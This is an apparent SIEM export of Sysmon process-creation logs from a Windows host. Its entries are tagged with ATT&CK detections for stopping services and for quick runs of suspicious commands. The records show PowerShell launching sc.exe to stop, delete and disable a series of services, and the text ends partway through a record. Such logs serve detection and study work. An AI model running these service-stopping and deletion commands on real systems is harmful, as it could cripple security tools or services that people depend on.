C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.461392200Z"",""eventRecordID"":""3404"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.457\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001093332e00}\r\nProcessId: 5592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:59.457"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001093332e00}"",""processId"":""5592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.566",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.407 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001018312e00} +ProcessId: 360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.410918100Z"",""eventRecordID"":""3401"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.407\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001018312e00}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.407"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001018312e00}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.537",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.350 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010112f2e00} +ProcessId: 5176 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.352554400Z"",""eventRecordID"":""3399"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.350\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010112f2e00}\r\nProcessId: 5176\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.350"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010112f2e00}"",""processId"":""5176"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.519",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.325 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010182e2e00} +ProcessId: 7276 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.328100100Z"",""eventRecordID"":""3398"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.325\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010182e2e00}\r\nProcessId: 7276\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.325"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010182e2e00}"",""processId"":""7276"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.471",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:51:59.254 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00100a2b2e00} +ProcessId: 2492 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.256745400Z"",""eventRecordID"":""3395"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.254\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00100a2b2e00}\r\nProcessId: 2492\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.254"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00100a2b2e00}"",""processId"":""2492"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.406",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.171 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001039282e00} +ProcessId: 5056 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.175408800Z"",""eventRecordID"":""3392"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.171\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001039282e00}\r\nProcessId: 5056\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.171"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001039282e00}"",""processId"":""5056"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.390",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.143 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001057272e00} +ProcessId: 2496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Natimmonal Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.145336800Z"",""eventRecordID"":""3391"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.143\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001057272e00}\r\nProcessId: 2496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration 